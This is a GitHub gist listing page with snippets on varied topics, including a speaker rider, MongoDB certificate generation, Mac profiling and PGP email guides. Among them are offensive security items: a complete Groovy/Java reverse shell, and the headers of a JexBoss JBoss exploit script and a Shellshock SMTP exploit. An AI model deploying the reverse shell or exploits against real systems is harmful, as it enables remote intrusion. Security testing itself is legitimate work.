Skip to content

Instantly share code, notes, and snippets.

View caseydunham's full-sized avatar

Casey Dunham caseydunham

View GitHub Profile
@tatianamac
tatianamac / tatiana-mac-speaker-rider.md
Last active November 6, 2024 15:21
Tatiana Mac's Speaker Rider

Speaker Rider

by Tatiana Mac

Last updated 14 April 2021

What is a speaker rider?

As speaking comes with immense privilege, I have crafted a speaker rider to set expectations and boundaries around my engagement. I am grateful to all the conference organisers who have brilliantly hosted me. I would love to continue to exercise this privilege to speak at conferences, and use this privilege to make the landscape more accessible and beneficial to tech's most historically excluded and marginalised communities.

Considerations

😫 I provide a lot of explanations for those of you who never had to consider these things. Most thoughtful conferences I've attended check most of these boxes intrinsically, particularly when conference runners are experienced speakers. They get it.

@kevinadi
kevinadi / mongodb-ssl.sh
Last active September 20, 2024 10:10
Script to create self-signed CA certificates, server certificates, and client certificates for testing MongoDB with SSL
#!/bin/sh
# Generate self signed root CA cert
openssl req -nodes -x509 -newkey rsa:2048 -keyout ca.key -out ca.crt -subj "/C=AU/ST=NSW/L=Sydney/O=MongoDB/OU=root/CN=`hostname -f`/[email protected]"
# Generate server cert to be signed
openssl req -nodes -newkey rsa:2048 -keyout server.key -out server.csr -subj "/C=AU/ST=NSW/L=Sydney/O=MongoDB/OU=server/CN=`hostname -f`/[email protected]"
# Sign the server cert
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@bmaupin
bmaupin / build-openssl.sh
Last active December 11, 2023 20:24
Build openssl (with SSLv2/3 support for security testing)
#!/bin/bash
# Cache sudo password
sudo -v
# Get latest OpenSSL 1.0.2 version from https://openssl.org/source/
# v1.1.0 seems to have removed SSLv2/3 support
openssl_version=1.0.2k
# Install build dependencies
@loderunner
loderunner / 01-mac-profiling.md
Last active October 24, 2024 20:57
Profiling an application in Mac OS X

Profiling an application in Mac OS X

Finding which process to profile

If your system is running slowly, perhaps a process is using too much CPU time and won't let other processes run smoothly. To find out which processes are taking up a lot of CPU time, you can use Apple's Activity Monitor.

The CPU pane shows how processes are affecting CPU (processor) activity:

@bnagy
bnagy / gpgmutt.md
Last active August 10, 2024 22:44
Mutt, Gmail and GPG

GPG / Mutt / Gmail

About

This is a collection of snippets, not a comprehensive guide. I suggest you start with Operational PGP.

Here is an incomplete list of things that are different from other approaches:

  • I don't use keyservers. Ever.
  • Yes, I use Gmail instead of some bespoke hipster freedom service
@googleinurl
googleinurl / JexBoss.py
Created June 19, 2015 03:32
JexBoss - Jboss Verify Tool - (MASS) / SCRIPT Edited by: GoogleINURL
#coding: utf-8
'''
--------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] SCRIPT original: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
--------------------------------------------------------------------------------------
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
@ajinabraham
ajinabraham / gifjs.asm
Last active November 16, 2023 07:20
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@claudijd
claudijd / exploit.py
Last active August 7, 2021 11:45
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
@grugq
grugq / gist:03167bed45e774551155
Last active October 30, 2024 02:44
operational pgp - draft

Operational PGP

This is a guide on how to email securely.

There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.